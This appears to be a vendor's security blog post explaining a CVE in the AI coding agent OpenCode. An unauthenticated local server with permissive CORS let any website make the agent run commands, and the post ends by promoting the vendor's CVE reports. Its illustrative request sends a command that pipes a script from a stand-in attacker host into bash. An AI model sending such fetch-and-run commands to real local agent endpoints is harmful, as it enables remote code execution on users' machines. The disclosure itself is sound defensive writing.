Overview

A recently disclosed vulnerability in the AI coding agent OpenCode, tracked as CVE-2026-22812, highlights a growing security concern around AI-assisted developer tools. The issue allowed arbitrary code execution on a user’s system simply by visiting a website, as long as OpenCode was running locally. No user interaction, special configuration, or elevated privileges were required. A closely related follow-up issue was later assigned CVE-2026-22813.

What went wrong

Before version 1.0.216, OpenCode automatically started an unauthenticated local HTTP server whenever the agent was active. This server was not clearly visible to users and did not require authentication. Due to an overly permissive CORS (Cross-Origin Resource Sharing) configuration, any website could send requests to this local service.

Because OpenCode is designed to execute commands on behalf of the developer, this effectively meant that a remote website could instruct the local agent to run arbitrary code on the user’s machine.

A simplified example

Conceptually, the attack flow looked like this:

# OpenCode is running locally
localhost:3000  # unauthenticated HTTP server

A malicious website could issue a background request similar to:

POST http://localhost:3000/execute
Content-Type: application/json

{
  "command": "curl attacker.example/payload.sh | bash"
}

No clicks, no prompts, no warnings. As long as OpenCode was running, the command executed with the same permissions as the user. This is why the vulnerability received a high severity score (8.8).

Later versions attempted to mitigate the issue by tightening CORS rules, but the server still ran silently in the background. Only from version 1.1.10 onward was the server disabled by default, and even then without prominent security advisories.

Why this matters beyond OpenCode

OpenCode itself is not widely deployed, but the pattern is becoming common. Modern AI coding assistants are no longer passive libraries. They:

• Read and write files
• Execute shell commands
• Interact with IDEs and build systems
• Sometimes expose local network services

When such tools rely on insecure defaults, implicit trust, or browser-side controls like CORS as a security boundary, they become an attractive target. In this case, a simple website became a delivery mechanism for remote code execution.

The broader risk is clear: AI agents expand the attack surface of developer machines, often without developers realising it.

BaseFortify analysis and attack flow

BaseFortify has published full technical analyses of both vulnerabilities:

• https://basefortify.eu/cve_reports/2026/01/cve-2026-22812.html
• https://basefortify.eu/cve_reports/2026/01/cve-2026-22813.html

Each CVE report includes a clear technical breakdown, a Q & A section, access to the BaseFortify AI Assistant, and an attack flow graph showing how the CVE maps to underlying CWE weaknesses, CAPEC attack patterns, and MITRE ATT&CK techniques. This approach helps translate abstract vulnerability data into concrete, real-world attack scenarios.

How BaseFortify helps

BaseFortify is designed to make vulnerabilities understandable and actionable. Instead of stopping at severity scores, it shows how an issue can actually be exploited, what an attacker would gain, and where it fits in a broader attack chain.

For organisations using AI tooling, this makes it easier to assess whether a vulnerability is merely theoretical or directly exploitable in their environment. By correlating CVEs with CWE, CAPEC, and MITRE ATT&CK, BaseFortify helps teams reason about risk in attacker terms, not just compliance terms.

Readers can register for free at https://basefortify.eu/register to access CVE reports, attack graphs, and the AI Assistant.

Resources

• CVE-2026-22812 report
• CVE-2026-22813 report
• Original disclosure (Security.nl)
• BaseFortify CVE reports overview

AI coding assistants are powerful productivity tools, but cases like OpenCode show why they must be treated as first-class security components, not just helpful add-ons.